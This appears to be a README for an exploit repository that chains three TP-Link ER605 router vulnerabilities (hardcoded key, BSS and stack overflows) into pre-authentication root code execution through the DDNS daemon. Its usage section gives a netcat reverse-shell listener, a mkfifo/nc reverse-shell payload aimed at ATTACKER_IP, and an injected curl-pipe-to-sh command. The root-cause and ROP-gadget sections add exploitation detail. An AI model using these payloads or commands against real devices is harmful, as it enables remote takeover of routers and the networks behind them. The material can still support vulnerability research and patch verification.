Share
## https://sploitus.com/exploit?id=F3D4DCD0-CECB-5284-A0A9-1339988C810F
# CVE-2024-5243-pwn2own-toronto-2023

## TP-Link ER605 Pre-Auth RCE (CVE-2024-5242 / CVE-2024-5243 / CVE-2024-5244)

Pre-authentication Remote Code Execution exploit for TP-Link Omada ER605 router via DDNS client daemon (`cmxddnsd`).

## Overview

This repository contains a Proof-of-Concept exploit that chains three vulnerabilities in the TP-Link ER605's `cmxddnsd` daemon to achieve remote code execution as root:

| CVE | Type | Description |
|-----|------|-------------|
| CVE-2024-5244 | Hardcoded Credentials | Encryption key hardcoded in binary (custom Base64 + 3DES-ECB) |
| CVE-2024-5242 | BSS Buffer Overflow | UpdateSvr1 field overflow enables info leak for ASLR bypass |
| CVE-2024-5243 | Stack Buffer Overflow | ErrorCode field overflow enables ROP chain execution |

## Affected Versions

- **Target**: TP-Link Omada ER605 VPN Router
- **Vulnerable**:  โš ๏ธ **Important**: This exploit assumes the attacker has already established a Man-in-the-Middle (MITM) position on the router's WAN interface.

The MITM position can be achieved through:
- DHCP spoofing on the WAN network
- ARP spoofing
- Rogue access point
- Physical network access

Once in MITM position, the attacker can:
1. Intercept DNS queries from the router
2. Spoof DNS responses to redirect `Dns1.comexe.net` to attacker's IP
3. Serve malicious DDNS responses on UDP port 9994

## Attack Flow

```
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”     DNS Query      โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚   TP-Link       โ”‚ โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ–ถ  โ”‚    Attacker     โ”‚
โ”‚   ER605         โ”‚                    โ”‚   (MITM)        โ”‚
โ”‚                 โ”‚ โ—€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ โ”‚                 โ”‚
โ”‚                 โ”‚   Spoofed Response โ”‚                 โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค                    โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚ Phase 1:        โ”‚ โ—€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ โ”‚ Info Leak       โ”‚
โ”‚ Leaks libc addr โ”‚   BSS Overflow    โ”‚ Payload         โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค                    โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚ Phase 2:        โ”‚ โ—€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ โ”‚ ROP Chain       โ”‚
โ”‚ Code Execution  โ”‚   Stack Overflow  โ”‚ Payload         โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜                    โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
```

## Usage

```bash
# 1. Set up reverse shell listener
nc -lvnp 9999

# 2. Create payload script and start web server
echo 'mkfifo /tmp/f;cat /tmp/f|sh|nc ATTACKER_IP 9999 >/tmp/f' > s
python3 -m http.server 8080

# 3. Run exploit (requires root for port 53)
sudo python3 exploit.py ATTACKER_IP
```

The exploit will automatically use the command: `;curl ATTACKER_IP:8080/s|sh;#`

## Configuration

The exploit requires the following offsets to be filled in based on the target's libc version:

```python
# libc offsets (must be determined through analysis)
LIBC_CMD_OFFSET = 0x0        # Address where ErrorCode string is cached
LIBC_SYSTEM_OFFSET = 0x0     # system() function offset
LIBC_GADGET_OFFSET = 0x0     # ROP gadget offset

# Info leak offsets
RESET_TLS_LEAK_OFFSET = 0x0  # Offset in leaked data containing libc pointer
RESET_TLS_LIBC_OFFSET = 0x0  # Offset from leaked pointer to libc base
```

## Technical Details

### Vulnerability Root Cause

The `_chkPkt` function uses `strncpy()` with attacker-controlled length:

```c
char* end = strchr(ptr, '\x01');   // Find delimiter
int len = end - ptr;                // Attacker controls this
strncpy(dest, ptr, len);            // Overflow!
```

### ROP Gadget

The exploit uses a MIPS delay slot gadget:

```assembly
move    $t9, $s0      ; $t9 = system address
jalr    $t9           ; call system()
move    $a0, $s1      ; DELAY SLOT: $a0 = command string
```

### Payload Constraints

- No NULL bytes (`\x00`) - strncpy terminates
- No `\x01` bytes - protocol field delimiter

## Files

- `exploit.py` - Main exploit script
- `README.md` - This file

## Disclaimer

This code is provided for educational and authorized security research purposes only. Unauthorized access to computer systems is illegal. The author is not responsible for any misuse of this software.

## Credits

- Original vulnerability discovery: [Claroty Research Team82](https://claroty.com/team82/) at Pwn2Own Toronto 2023
- This PoC: Independent reproduction and analysis

## References

- [ZDI Advisory - CVE-2024-5242](https://www.zerodayinitiative.com/advisories/ZDI-24-853/)
- [ZDI Advisory - CVE-2024-5243](https://www.zerodayinitiative.com/advisories/ZDI-24-854/)
- [ZDI Advisory - CVE-2024-5244](https://www.zerodayinitiative.com/advisories/ZDI-24-852/)
- [TP-Link Security Advisory](https://www.tp-link.com/us/support/download/er605/)

## Timeline

| Date | Event |
|------|-------|
| 2023-10 | Pwn2Own Toronto 2023 |
| 2024-05 | CVE IDs assigned |
| 2024-06 | Patch released (2.2.4) |